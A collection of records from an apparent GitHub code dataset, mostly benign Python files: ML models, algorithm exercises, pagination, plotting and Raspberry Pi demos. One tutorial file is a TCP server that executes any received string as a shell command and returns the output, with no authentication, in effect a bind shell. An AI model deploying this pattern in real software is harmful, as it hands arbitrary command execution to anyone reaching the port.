self.traj_attn_intent_dim>0:\n\t\t\thidden_out_traj = self.attn_pool(hidden_out_traj)\n\t\t\tclf_inp = torch.cat([clf_inp, hidden_out_traj], dim=1)\n\t\tout_intent,_ = self.classifier(clf_inp)\n\n\t\treturn out_traj, out_intent\n\ndef create_model(params):\n\ttrain_params = params.train_param()\n\tif train_params['init_model'] is not None:\n\t\tmodel = torch.load(train_params['init_model'])\n\t\tprint('load model', train_params['init_model'])\n\telse:\n\t\tmodel = MultiTask_Model(\n\t\t\tencoder_type=train_params['encoder'],\n\t\t\tpool_type=train_params['pool_type'],\n\t\t\tdecoder_type=train_params['decoder'],\n\t\t\tparams=params)\n\n\tparam_num = sum([p.data.nelement() for p in model.parameters()])\n\tprint(\"Number of model parameters: {} M\".format(param_num / 1024. 
/ 1024.))\n\tmodel.train()\n\n\treturn model\n","repo_name":"intelligent-control-lab/MEKF_MAME","sub_path":"models/model_factory.py","file_name":"model_factory.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"51"} +{"seq_id":"27846875812","text":"\"\"\"\nThe client sends a command to the server; the server executes it and\nreturns the result to the client, which then shows it to the user.\n\"\"\"\nimport socket\nimport subprocess\n\n\nsk = socket.socket()# TCP transport by default\nsk.bind((\"127.0.0.1\", 8071))\nsk.listen()\nconn, addr = sk.accept()\nwhile 1:\n\tcmd = conn.recv(1024).decode(\"utf-8\")\n\tr = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tstdout = r.stdout.read()  # success output, bytes\n\tstderr = r.stderr.read()  # error output, bytes\n\tif not stderr:\n\t\tconn.send(stdout)\n\telse:\n\t\tconn.send(stderr)\nconn.close()\nsk.close()\n","repo_name":"dengyungao/python","sub_path":"老男孩python全栈开发第14期/python基础知识(day1-day40)/网络编程/连接到远程服务器执行命令并返回结果/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"39508028576","text":"class Solution:\n    def merge(self, nums1, m, nums2, n):\n        \"\"\"\n        Do not return anything, modify nums1 in-place instead.\n        \"\"\"\n        while m > 0 and n > 0:\n            if nums1[m-1] <= nums2[n-1]:\n                nums1[m+n-1] = nums2[n-1]\n                n -= 1\n            else:\n                nums1[m+n-1] = nums1[m-1]\n                m -= 1\n\n        if m == 0 and n > 0:\n            nums1[:n] = nums2[:n]\n\n","repo_name":"jeremybaby/leetcode","sub_path":"Python/088_merge_sorted_array.py","file_name":"088_merge_sorted_array.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"33624600459","text":"#!/usr/bin/python3\n\nfrom collections import Counter\nimport subprocess\nimport json\nimport time\nimport sys\nimport graphyte\nimport math\n\n\ndef cli(cmd='uname'):\n    result = subprocess.run(cmd.split(), stdout=subprocess.PIPE)\n    return(result.stdout.decode('utf-8').strip())\n\n# Load sensitive config\ntry:\n    with open('/etc/testnet_config.json') as config_file:\n        config = json.load(config_file)\n        testnet = config['testnet']\n\nexcept IOError as error:\n    print('Error opening secrets config:', error)\n    sys.exit(1)\n\nstatus = cli('mina client status -json')\nblock = json.loads(status)['blockchain_length']\nprint('Block:', block)\n\nsnark_job_list = json.loads(cli('mina advanced snark-job-list'))\n\nleavestotal = Counter()\n\ntreecount = 0\nfor tree in snark_job_list:\n    print('=' * 70)\n    print('🌲:', treecount, 'Size:', len(tree))\n    treecount += 1\n    leavesbytree = Counter()\n\n    output_line = ''\n    for job in tree:\n        (slotid, data) = job\n\n        # merge proofs\n        if 'M' in data:\n            if len(data['M']) > 0:\n                output_line += str(len(data['M']))\n            else:\n                output_line += '_'\n        # transaction proofs (leaves)\n        elif 'B' in data:\n            if len(data['B']) > 0:\n                leavesbytree['occupied'] += 1\n                leavestotal['occupied'] += 1\n\n                if 'Status' in data['B'][2]:\n                    if data['B'][2]['Status'] == 'Todo':\n                        output_line += 'b'\n                    elif data['B'][2]['Status'] == 'Done':\n                        output_line += 'B'\n                    else:\n                        output_line += '?'\n\n            else:\n                leavesbytree['empty'] += 1\n                leavestotal['empty'] += 1\n                output_line += '_'\n            leavesbytree['total'] += 1\n            leavestotal['total'] += 1\n        else:\n            # should never get here\n            print('found no match:', data)\n\n        # Print lines on powers of 2\n        if (not math.log(slotid + 2, 2) % 1):\n            # print a new line for a new level of tree\n            
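# (a row of the perfect binary tree ends where slotid + 2 is a power of two: slotid = 0, 2, 6, 14, ...)\n            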
print(output_line.center(int(len(tree)/2)))\n output_line = ''\n\n\n\n print(leavesbytree)\nprint('TOTALS:', leavestotal)","repo_name":"MinaProtocol/mina","sub_path":"automation/scripts/get-snark-job-list.py","file_name":"get-snark-job-list.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":1846,"dataset":"github-code","pt":"51"} +{"seq_id":"25815059633","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom captcha.image import ImageCaptcha\nfrom Web.DatabaseHub import VerificationCode\nfrom django.http import JsonResponse,HttpResponse\nfrom ClassCongregation import ErrorLog,randoms\nfrom Web.Workbench.LogRelated import RequestLogRecord\n\n\ndef GenerateVerificationCode(request):#生成验证码函数\n RequestLogRecord(request, request_api=\"get_verification_code\")\n if request.method == \"GET\":\n try:\n random_verification_code = randoms().LowercaseAndNumbers(6)#获取小写的字符串\n random_verification_code_key=randoms().result(250)#生成验证码相关联的key\n picture_bitstream = ImageCaptcha().generate(random_verification_code).read()#获取图片比特流\n VerificationCode().Write(code=random_verification_code,verification_code_key=random_verification_code_key)#把值写入到数据库中\n result=HttpResponse(picture_bitstream)#把图片比特流复制给返回包\n result['VerificationCodeKey'] = random_verification_code_key#把值传到返回包的头中\n result['Access-Control-Expose-Headers']=\"VerificationCodeKey\"#添加头内容保证前端能够获取到值\n return result\n except Exception as e:\n ErrorLog().Write(e)\n return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, })\n else:\n return JsonResponse({'message': '请使用GET请求', 'code': 500, })\n\n","repo_name":"Ascotbe/Medusa","sub_path":"Web/BasicFunctions/VerificationCode.py","file_name":"VerificationCode.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":2045,"dataset":"github-code","pt":"51"} +{"seq_id":"75081514718","text":"from fastapi import FastAPI,Security\nimport appConfig \nfrom api import api_router\nfrom fastapi_azure_auth.auth import SingleTenantAzureAuthorizationCodeBearer\n\n\napp = app = FastAPI(\n swagger_ui_oauth2_redirect_url='/oauth2-redirect',\n swagger_ui_init_oauth={\n 'usePkceWithAuthorizationCodeGrant': True,\n 'clientId': appConfig.CLIENT_ID\n },\n)\n\nazure_scheme = SingleTenantAzureAuthorizationCodeBearer(\n app_client_id=appConfig.CLIENT_ID,\n tenant_id=appConfig.TENANT_ID,\n scopes={\n f'api://{appConfig.CLIENT_ID}/User-Read': 'User-Read',\n }\n)\n\n\napp.include_router(api_router, prefix=\"/api\",dependencies=[Security(azure_scheme, scopes=['User-Read'])])\n","repo_name":"athempeed/AzureAD-Authentication-PythonAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5762452022","text":"from hnswlib_hnsw import HNSWIndex\nfrom faiss_ivf import FaissIvfIndex\nfrom data_module import Data\n\n\nclass Index:\n def __init__(self):\n self.ivf_flat = FaissIvfIndex()\n self.hnsw = HNSWIndex()\n\n self.data = Data()\n self.vectors_path = \"./data/vectors.csv\"\n self.key_attr = 'name'\n self.vector_attr = 'vector'\n self.data.init_vectors(\n self.vectors_path, self.key_attr, self.vector_attr)\n self.vectors_count = self.data.vectors_count\n\n self.set_index_type('ivf_flat')\n self.index.set_vectors(self.data.vectors)\n\n def set_index_type(self, index_type):\n if index_type == 'hnsw':\n self.index_type = 'hnsw'\n self.index = self.hnsw\n elif index_type == 'ivf_flat':\n 
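# inverted-file flat index backed by FAISS (FaissIvfIndex above); the 'hnsw' branch selects the hnswlib graph index instead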
self.index_type = 'ivf_flat'\n self.index = self.ivf_flat\n else:\n raise RuntimeError('Index Name Error')\n\n if self.data.has_data:\n self.index.set_vectors(self.data.vectors)\n\n def set_data(self, data, key_attr='name', vector_attr='vector'):\n self.data.set_data(data, key_attr, vector_attr)\n self.index.set_vectors(self.data.train_vectors)\n\n def set_search_params(self, params):\n self.index.set_search_params(params)\n\n def set_build_params(self, params):\n self.index.set_build_params(params)\n\n def get_search_vis_data(self, p):\n vis_res = self.index.get_search_vis_data(p)\n self.data.map_key(vis_res)\n return vis_res\n\n def search_by_id(self, id):\n # if not self.data.has_data:\n # return None\n vis_res = self.index.get_search_vis_data(self.data.vectors[id])\n # self.data.map_keys(vis_res)\n return vis_res\n\n def get_corase_vis_data(self, id):\n if self.index_type == 'ivf_flat':\n return self.index.get_corase_vis_data()\n\n else:\n return []\n","repo_name":"zilliztech/vector-index-visualization-tool","sub_path":"server/index/index_manage.py","file_name":"index_manage.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"51"} +{"seq_id":"30846346859","text":"#!/usr/bin/env python3\n\"\"\"\nImplement a get_hyper method that takes the same arguments\n(and defaults) as get_page and returns a dictionary\ncontaining the following key-value pairs:\n page_size: the length of the returned dataset page\n page: the current page number\n data: the dataset page (equivalent to return from previous task)\n next_page: number of the next page, None if no next page\n prev_page: number of the previous page, None if no previous page\n total_pages: the total number of pages in the dataset as an integer\nMake sure to reuse get_page in your implementation.\nYou can use the math module if necessary.\n\"\"\"\nimport csv\nimport math\nfrom typing import List\n\n\nclass Server:\n \"\"\"\n Server class to paginate a database of popular baby names.\n \"\"\"\n DATA_FILE = \"Popular_Baby_Names.csv\"\n\n def __init__(self):\n self.__dataset = None\n\n def dataset(self) -> List[List]:\n \"\"\"Cached dataset\n \"\"\"\n if self.__dataset is None:\n with open(self.DATA_FILE) as f:\n reader = csv.reader(f)\n dataset = [row for row in reader]\n self.__dataset = dataset[1:]\n\n return self.__dataset\n\n def index_range(self, page: int, page_size: int) -> tuple:\n \"\"\"\n Return a tuple of size two containing a start index\n and an end index corresponding to the range of indexes\n to return in a list for those particular pagination parameters.\n \"\"\"\n start_index = (page - 1) * page_size\n end_index = start_index + page_size\n return (start_index, end_index)\n\n def get_page(self, page: int = 1, page_size: int = 10) -> List[List]:\n \"\"\"\n Takes two integer arguments\n and return the appropriate page of the dataset.\n \"\"\"\n assert type(page) == int or type(page_size) == int\n assert page > 0 or page_size > 0\n start, end = self.index_range(page, page_size)\n data = self.dataset()\n list_result = []\n\n if start >= len(data):\n return list_result\n return data[start:end]\n\n def get_hyper(self, page: int, page_size: int) -> dict:\n \"\"\"\n Returns a dictionary containing a set of key-value pairs.\n \"\"\"\n data = self.get_page(page, page_size)\n size_all_pages = math.ceil(len(self.dataset()) / page_size)\n next_page = page + 1 if page + 1 < size_all_pages else None\n prev_page = page - 1 if page > 1 else None\n\n 
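# worked example with hypothetical sizes: a 1000-row dataset and get_hyper(page=3, page_size=100) yield total_pages=10, next_page=4, prev_page=2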
hyper_data = {\n            \"page_size\": len(data),\n            \"page\": page,\n            \"data\": data,\n            \"next_page\": next_page,\n            \"prev_page\": prev_page,\n            \"total_pages\": size_all_pages,\n        }\n\n        return hyper_data\n","repo_name":"jbocane6/holbertonschool-backend","sub_path":"0x00-pagination/2-hypermedia_pagination.py","file_name":"2-hypermedia_pagination.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"39727532624","text":"from scipy.interpolate import interp1d\nfrom scipy.integrate import quad\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nactual = [1, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0]\npredict = [0.7, 0.2, 0.9, 0.75, 0.5, 0.9, 0.7, 0.63, 0.1, 0.25, 0.36, 0.05, 0.9, 0.3, 0.24]\n\ndata = zip(actual, predict)\nsorted_data = sorted(data, key=lambda d: d[1], reverse=True)\nsorted_actual = [d[0] for d in sorted_data]\n\ncumulative_actual = np.cumsum(sorted_actual) / sum(actual)\ncumulative_index = np.arange(1, len(cumulative_actual)+1) / len(predict)\ncumulative_actual_perfect = np.cumsum(sorted(actual, reverse=True)) / sum(actual)\n\nx_values = [0] + list(cumulative_index)\ny_values = [0] + list(cumulative_actual)\ny_values_perfect = [0] + list(cumulative_actual_perfect)\n\nf1, f2 = interp1d(x_values, y_values), interp1d(x_values, y_values_perfect)\nS_pred = quad(f1, 0, 1, points=x_values)[0] - 0.5\nS_actual = quad(f2, 0, 1, points=x_values)[0] - 0.5\n\nfig, ax = plt.subplots(nrows=1,ncols=2, sharey=True, figsize=(14, 7))\nax[0].plot(x_values, y_values, lw = 2, color = 'blue', marker='x')\nax[0].fill_between(x_values, x_values, y_values, color = 'blue', alpha=0.1)\nax[0].text(0.4,0.2,'S = {:0.4f}'.format(S_pred))\nax[1].plot(x_values, y_values_perfect, lw = 2, color = 'green', marker='x')\nax[1].fill_between(x_values, x_values, y_values_perfect, color = 'green', alpha=0.1)\nax[1].text(0.4,0.2,'S = {:0.4f}'.format(S_actual),fontsize = 28)\n\nfor i in range(2):\n    ax[i].plot([0,1],[0,1],linestyle = '--',lw = 2,color = 'black')\n    ax[i].set(title='Коэффициент Джини', xlabel='Кумулятивная доля объектов',\n              ylabel='Кумулятивная доля истинных классов', xlim=(0, 1), ylim=(0, 1))\nplt.show();","repo_name":"Zagryazhskaya/Machine-learning","sub_path":"Gini_koef.py","file_name":"Gini_koef.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43154944971","text":"def find_sum_integers(number):\r\n    sum = 0\r\n    number = str(number)\r\n    for digit in number:\r\n        sum += int(digit)\r\n    return sum\r\n\r\ntest_case = int(input())\r\n\r\nwhile test_case != 0:\r\n    target = find_sum_integers(test_case)\r\n    done = False\r\n    counter = 11\r\n    while not done:\r\n        if find_sum_integers(test_case * counter) == target:\r\n            print(counter)\r\n            done = True\r\n        else:\r\n            counter += 1\r\n    test_case = int(input())\r\n","repo_name":"mg-blvd/Kattis_Solutions","sub_path":"TheEasiestProblemIsThisOne.py","file_name":"TheEasiestProblemIsThisOne.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16079226023","text":"'''\nInput: s = \"abcabcbb\"\nOutput: 3\nInput: s = \"bbbbb\"\nOutput: 1\nInput: s = \"pwwkew\"\nOutput: 3\n'''\nclass Solution:\n    def lengthOfLongestSubstring(self, s): \n        substring = []\n        longest = 0\n        for char in s:\n            if char not in substring:\n                substring.append(char)\n                if len(substring) > longest:\n                    longest = 
len(substring)\n else:\n repeat_index = substring.index(char)\n substring = substring[repeat_index+1:]\n substring.append(char)\n return longest\n \nprint(Solution().lengthOfLongestSubstring(s = \"bbbbb\"))","repo_name":"matthewjkang/Leetcode","sub_path":"[3]LSWRC.py","file_name":"[3]LSWRC.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70574841440","text":"## ###############################################################\n## MODULES\n## ###############################################################\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom mayavi import mlab\n\nfrom MyAlgorithms.PlotIsosurface import genPointCloud\nfrom MyAlgorithms.AStar3D import genAdjDict_parallel, aStar\n\n\n## ###############################################################\n## HELPER FUNCTIONS\n## ###############################################################\ndef gyroid(x, y, z):\n return np.cos(x) * np.sin(y) + np.cos(y) * np.sin(z) + np.cos(z) * np.sin(x)\n\ndef printPoint(point, pre=\"\"):\n print(f\"{pre}[{point[0]:.3f}, {point[1]:.3f}, {point[2]:.3f}],\")\n\n\n## ###############################################################\n## PROGRAM MAIN\n## ###############################################################\ndef main():\n start_time = time.time()\n ## generate issurface data\n print(\"Generating point cloud...\")\n verts, faces, normals = genPointCloud(implicit_func=gyroid, res=30)\n print(\"Computing adjacency dictionary...\")\n # dict_adj = genAdjDict(verts, faces)\n dict_adj = genAdjDict_parallel(verts.shape[0], faces.shape[0], faces)\n ## plot isosurface\n mlab.triangular_mesh(verts[:,0], verts[:,1], verts[:,2], faces)\n ## compute edge points\n list_vi = []\n for vi in range(len(verts)):\n if len(dict_adj[vi]) < 4:\n list_vi.append(vi)\n mlab.points3d(verts[vi,0], verts[vi,1], verts[vi,2])\n printPoint(verts[vi])\n ## show canvas\n mlab.show()\n end_time = time.time()\n print(f\"Elapsed time: {end_time - start_time:.3f} seconds\")\n\n\n## ###############################################################\n## PROGRAM ENTRY POINT\n## ###############################################################\nif __name__ == \"__main__\":\n main()\n\n\n## END OF PROGRAM","repo_name":"AstroKriel/Geodesics","sub_path":"PlotGyroid.py","file_name":"PlotGyroid.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"de","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"31782660621","text":"#!/usr/bin/python\n#coding=utf8\n\n\"\"\"\n# Created : 2018/12/26\n# Version : python2.7\n# Author : yibo.li \n# File : han_model.py\n# Desc : \n\"\"\"\n\nimport os\nfrom datetime import datetime\nimport tensorflow as tf\n\nfrom util.cnews_loader import *\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\n\nclass TextHan(object):\n def __init__(self, seq_length, num_classes, vocab_size):\n self.seq_length = seq_length\n self.num_classes = num_classes\n self.vocab_size = vocab_size\n self.embedding_dim = 128\n self.num_sentences = 10\n self.hidden_dim = 128\n self.context_dim = 256\n self.rnn_type = \"lstm\"\n self.input_x = tf.placeholder(tf.int32, [None, self.seq_length], name='input_x')\n self.input_y = tf.placeholder(tf.float32, [None, self.num_classes], name='input_y')\n self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')\n self.learning_rate = tf.placeholder(tf.float32, name='learn_rate')\n\n self.inference()\n\n def inference(self):\n\n def 
_get_cell():\n if self.rnn_type == \"vanilla\":\n return tf.nn.rnn_cell.BasicRNNCell(self.context_dim)\n elif self.rnn_type == \"lstm\":\n return tf.nn.rnn_cell.BasicLSTMCell(self.context_dim)\n else:\n return tf.nn.rnn_cell.GRUCell(self.context_dim)\n\n def _Bidirectional_Encoder(inputs, name):\n with tf.variable_scope(name):\n fw_cell = _get_cell()\n fw_cell = tf.nn.rnn_cell.DropoutWrapper(fw_cell, output_keep_prob=self.keep_prob)\n bw_cell = _get_cell()\n bw_cell = tf.nn.rnn_cell.DropoutWrapper(bw_cell, output_keep_prob=self.keep_prob)\n (output_fw, output_bw), states = tf.nn.bidirectional_dynamic_rnn(cell_fw=fw_cell,\n cell_bw=bw_cell,\n inputs=inputs,\n dtype=tf.float32)\n return output_fw, output_bw\n\n def _attention(inputs, name):\n with tf.variable_scope(name):\n # 使用一个全连接层编码 GRU 的输出,相当于一个隐藏层\n # [batch_size,sentence_length,hidden_size * 2]\n hidden_vec = tf.layers.dense(inputs, self.hidden_dim * 2,\n activation=tf.nn.tanh, name='w_hidden')\n\n # u_context是上下文的重要性向量,用于区分不同单词/句子对于句子/文档的重要程度,\n # [hidden_size * 2]\n u_context = tf.Variable(tf.truncated_normal([self.hidden_dim * 2]), name='u_context')\n # [batch_size,sequence_length]\n alpha = tf.nn.softmax(tf.reduce_sum(tf.multiply(hidden_vec, u_context),\n axis=2, keep_dims=True), dim=1)\n # before reduce_sum [batch_size, sequence_length, hidden_szie*2],\n # after reduce_sum [batch_size, hidden_size*2]\n attention_output = tf.reduce_sum(tf.multiply(inputs, alpha), axis=1)\n\n return attention_output\n\n # 词向量映射\n with tf.name_scope(\"embedding\"):\n input_x = tf.split(self.input_x, self.num_sentences, axis=1)\n # shape:[None,self.num_sentences,self.sequence_length/num_sentences]\n input_x = tf.stack(input_x, axis=1)\n embedding = tf.get_variable(\"embedding\", [self.vocab_size, self.embedding_dim])\n # [None,num_sentences,sentence_length,embed_size]\n embedding_inputs = tf.nn.embedding_lookup(embedding, input_x)\n # [batch_size*num_sentences,sentence_length,embed_size]\n sentence_len = int(self.seq_length / self.num_sentences)\n embedding_inputs_reshaped = tf.reshape(embedding_inputs,\n shape=[-1, sentence_len, self.embedding_dim])\n with tf.name_scope(\"word_vec\"):\n (output_fw, output_bw) = _Bidirectional_Encoder(embedding_inputs_reshaped, \"word_vec\")\n # [batch_size*num_sentences,sentence_length,hidden_size * 2]\n word_hidden_state = tf.concat((output_fw, output_bw), 2)\n\n with tf.name_scope(\"word_attention\"):\n \"\"\"\n attention process:\n 1.get logits for each word in the sentence.\n 2.get possibility distribution for each word in the sentence.\n 3.get weighted sum for the sentence as sentence representation.\n \"\"\"\n # [batch_size*num_sentences, hidden_size * 2]\n sentence_vec = _attention(word_hidden_state, \"word_attention\")\n\n with tf.name_scope(\"sentence_vec\"):\n # [batch_size,num_sentences,hidden_size*2]\n sentence_vec = tf.reshape(sentence_vec, shape=[-1, self.num_sentences,\n self.context_dim * 2])\n output_fw, output_bw = _Bidirectional_Encoder(sentence_vec, \"sentence_vec\")\n # [batch_size*num_sentences,sentence_length,hidden_size * 2]\n sentence_hidden_state = tf.concat((output_fw, output_bw), 2)\n\n with tf.name_scope(\"sentence_attention\"):\n # [batch_size, hidden_size * 2]\n doc_vec = _attention(sentence_hidden_state, \"sentence_attention\")\n\n # Add dropout\n with tf.name_scope(\"dropout\"):\n h_drop = tf.nn.dropout(doc_vec, self.keep_prob)\n\n with tf.name_scope(\"score\"):\n # 分类器\n self.logits = tf.layers.dense(h_drop, self.num_classes, name='fc2')\n self.y_pred_cls = 
tf.argmax(tf.nn.softmax(self.logits), 1, name=\"pred\") # 预测类别\n\n with tf.name_scope(\"optimize\"):\n # 损失函数,交叉熵\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=self.logits, labels=self.input_y)\n self.loss = tf.reduce_mean(cross_entropy, name=\"loss\")\n # 优化器\n self.optim = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(self.loss)\n\n with tf.name_scope(\"accuracy\"):\n # 准确率\n correct_pred = tf.equal(tf.argmax(self.input_y, 1), self.y_pred_cls)\n self.acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32), name=\"acc\")\n\n\ndef evaluate(sess, model, x_, y_):\n \"\"\"\n 评估 val data 的准确率和损失\n \"\"\"\n data_len = len(x_)\n batch_eval = batch_iter(x_, y_, 64)\n total_loss = 0.0\n total_acc = 0.0\n for x_batch, y_batch in batch_eval:\n batch_len = len(x_batch)\n feed_dict = {model.input_x: x_batch, model.input_y: y_batch,\n model.keep_prob: 1}\n loss, acc = sess.run([model.loss, model.acc], feed_dict=feed_dict)\n total_loss += loss * batch_len\n total_acc += acc * batch_len\n\n return total_loss / data_len, total_acc / data_len\n\n\ndef test_model(sess, graph, x_, y_):\n \"\"\"\n\n :param sess:\n :param graph:\n :param x_:\n :param y_:\n :return:\n \"\"\"\n data_len = len(x_)\n batch_eval = batch_iter(x_, y_, 64)\n total_loss = 0.0\n total_acc = 0.0\n\n input_x = graph.get_operation_by_name('input_x').outputs[0]\n input_y = graph.get_operation_by_name('input_y').outputs[0]\n keep_prob = graph.get_operation_by_name('keep_prob').outputs[0]\n loss = graph.get_operation_by_name('optimize/loss').outputs[0]\n acc = graph.get_operation_by_name('accuracy/acc').outputs[0]\n\n for x_batch, y_batch in batch_eval:\n batch_len = len(x_batch)\n feed_dict = {input_x: x_batch, input_y: y_batch,\n keep_prob: 1}\n test_loss, test_acc = sess.run([loss, acc], feed_dict=feed_dict)\n total_loss += test_loss * batch_len\n total_acc += test_acc * batch_len\n\n return total_loss / data_len, total_acc / data_len\n\n\ndef main():\n word_to_id, id_to_word = word_2_id(vocab_dir)\n cat_to_id, id_to_cat = cat_2_id()\n\n x_train, y_train = process_file(train_dir, word_to_id, cat_to_id, max_length)\n x_val, y_val = process_file(val_dir, word_to_id, cat_to_id, max_length)\n\n epochs = 10\n best_acc_val = 0.0 # 最佳验证集准确率\n train_steps = 0\n val_loss = 0.0\n val_acc = 0.0\n with tf.Graph().as_default():\n seq_length = max_length\n num_classes = 10\n vocab_size = 5000\n model = TextHan(seq_length, num_classes, vocab_size)\n saver = tf.train.Saver()\n sess = tf.Session()\n with sess.as_default():\n sess.run(tf.global_variables_initializer())\n for epoch in range(epochs):\n print('Epoch:', epoch + 1)\n batch_train = batch_iter(x_train, y_train, 64)\n for x_batch, y_batch in batch_train:\n train_steps += 1\n learn_rate = 0.001\n # learning rate vary\n feed_dict = {model.input_x: x_batch, model.input_y: y_batch,\n model.keep_prob: 0.5, model.learning_rate: learn_rate}\n\n _, train_loss, train_acc = sess.run([model.optim, model.loss,\n model.acc], feed_dict=feed_dict)\n\n if train_steps % 500 == 0:\n val_loss, val_acc = evaluate(sess, model, x_val, y_val)\n\n if val_acc > best_acc_val:\n # 保存最好结果\n best_acc_val = val_acc\n last_improved = train_steps\n saver.save(sess, \"./model/han/model\", global_step=train_steps)\n # saver.save(sess=session, save_path=save_path)\n improved_str = '*'\n else:\n improved_str = ''\n\n now_time = datetime.now()\n msg = 'Iter: {0:>6}, Train Loss: {1:>6.2}, Train Acc: {2:>7.2%},' \\\n + ' Val Loss: {3:>6.2}, Val Acc: {4:>7.2%}, Time: {5} {6}'\n 
print(msg.format(train_steps, train_loss, train_acc, val_loss, val_acc, now_time, improved_str))\n\n\ndef test():\n word_to_id, id_to_word = word_2_id(vocab_dir)\n cat_to_id, id_to_cat = cat_2_id()\n x_test, y_test = process_file(test_dir, word_to_id, cat_to_id, max_length)\n graph_path = \"./model/han/model-7500.meta\"\n model_path = \"./model/han\"\n graph = tf.Graph()\n saver = tf.train.import_meta_graph(graph_path, graph=graph)\n sess = tf.Session(graph=graph)\n saver.restore(sess, tf.train.latest_checkpoint(model_path))\n test_loss, test_acc = test_model(sess, graph, x_test, y_test)\n print(\"Test loss: %f, Test acc: %f\" % (test_loss, test_acc))\n\n\nif __name__ == \"__main__\":\n base_dir = \"./data/cnews\"\n train_dir = os.path.join(base_dir, 'cnews.train.txt')\n test_dir = os.path.join(base_dir, 'cnews.test.txt')\n val_dir = os.path.join(base_dir, 'cnews.val.txt')\n vocab_dir = os.path.join(base_dir, 'cnews.vocab.txt')\n\n vocab_size = 5000\n max_length = 600\n\n if not os.path.exists(vocab_dir):\n build_vocab(train_dir, vocab_dir, vocab_size)\n\n main()\n # test()","repo_name":"liyibo/text-classification-demos","sub_path":"han_model.py","file_name":"han_model.py","file_ext":"py","file_size_in_byte":11326,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"51"} +{"seq_id":"4287447014","text":"from sense_hat import SenseHat\r\nfrom time import sleep\r\n\r\nsense = SenseHat()\r\n# sense.clear()\r\n\r\n#Basic Color Definitions\r\n# blue = (0, 0, 255)\r\n# red = (255, 0, 0)\r\n\r\n#Setting Individual Pixels\r\n#-----------------------------------------------\r\n# sense.set_pixel(0, 2, blue)\r\n# sense.set_pixel(7, 4, red)\r\n\r\n# sense.set_pixel(2, 2, (0, 0, 255))\r\n# sense.set_pixel(4, 2, (0, 0, 255))\r\n# sense.set_pixel(3, 4, (100, 0, 0))\r\n# sense.set_pixel(1, 5, (255, 0, 0))\r\n# sense.set_pixel(2, 6, (255, 0, 0))\r\n# sense.set_pixel(3, 6, (255, 0, 0))\r\n# sense.set_pixel(4, 6, (255, 0, 0))\r\n# sense.set_pixel(5, 5, (255, 0, 0))\r\n#-----------------------------------------------\r\n\r\n#Rotating image\r\n#-----------------------------------------------\r\n# w = (150, 150, 150)\r\n# b = (0, 0, 255)\r\n# e = (0, 0, 0)\r\n#\r\n# image = [\r\n# e,e,e,e,e,e,e,e,\r\n# e,e,e,e,e,e,e,e,\r\n# w,w,w,e,e,w,w,w,\r\n# w,w,b,e,e,w,w,b,\r\n# w,w,w,e,e,w,w,w,\r\n# e,e,e,e,e,e,e,e,\r\n# e,e,e,e,e,e,e,e,\r\n# e,e,e,e,e,e,e,e\r\n# ]\r\n#\r\n# sense.set_pixels(image)\r\n#\r\n# while True:\r\n# sleep(1)\r\n# sense.flip_h()\r\n#-----------------------------------------------\r\n\r\n#Smiley Pixels :)\r\n#-----------------------------------------------\r\n# Define some colours\r\ng = (0, 255, 0) # Green\r\nb = (0, 0, 0) # Black\r\nw = (255, 255, 255) #White\r\nu = (0, 0, 255) #Blue\r\n\r\n# Set up where each colour will display\r\nsmile_pixels = [\r\n g, g, g, g, g, g, g, g,\r\n g, g, g, g, g, g, g, g,\r\n g, u, u, g, g, u, u, g,\r\n g, u, u, g, g, u, u, g,\r\n g, g, g, g, g, g, g, g,\r\n g, u, g, g, g, g, u, g,\r\n g, g, u, u, u, u, g, g,\r\n g, g, g, g, g, g, g, g\r\n]\r\n\r\n# Display these colours on the LED matrix\r\nsense.set_pixels(smile_pixels)\r\n#-----------------------------------------------\r\n\r\n#Enviornment sensor readings\r\n#-----------------------------------------------\r\n# pressure = sense.get_pressure()\r\n# temp = sense.get_temperature()\r\n# humid = sense.get_humidity()\r\n#\r\n# print \"\\nPressure: {0:.2f} Millibars\\n\".format(pressure)\r\n# print \"Temperature: {0:.2f} Celsius\\n\".format(temp)\r\n# print \"Humidity: 
